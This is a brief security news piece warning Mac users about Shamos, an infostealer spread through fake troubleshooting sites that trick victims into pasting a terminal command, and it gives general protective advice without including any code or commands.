Cybercriminals are using deceptive tactics to trick Mac users into installing Shamos malware, a new variant of the Atomic macOS Stealer (AMOS) developed by a group known as COOKIE SPIDER. These attacks exploit users’ desire for quick solutions by mimicking legitimate troubleshooting websites and GitHub repositories. Victims are lured to these spoofed sites, where they are encouraged to copy and paste a terminal command that, instead of fixing their issue, installs Shamos malware on their device. This malware not only bypasses macOS Gatekeeper protections but also stealthily installs itself, posing a significant threat to user data.
Once installed, Shamos searches for sensitive information such as browser passwords, Apple Notes, Keychain items, and cryptocurrency wallets. The stolen data is then sent directly to the attackers, often along with additional malware like botnet modules or fake Ledger wallet apps. These tactics can lead to serious data breaches and financial losses for affected users. The malware is capable of downloading and installing additional malicious software, making it a particularly dangerous threat to Mac users.
To protect against such threats, users are urged to avoid executing commands from untrusted sources. Instead, they should seek verified solutions through official Apple support channels or reputable tech forums. Staying informed and cautious when encountering troubleshooting advice online is crucial in preventing infections. Cybersecurity experts also recommend that users maintain up-to-date security software to detect and block such malicious activities. Additionally, regular system updates and strong password practices can further enhance the security of macOS devices against emerging threats like Shamos.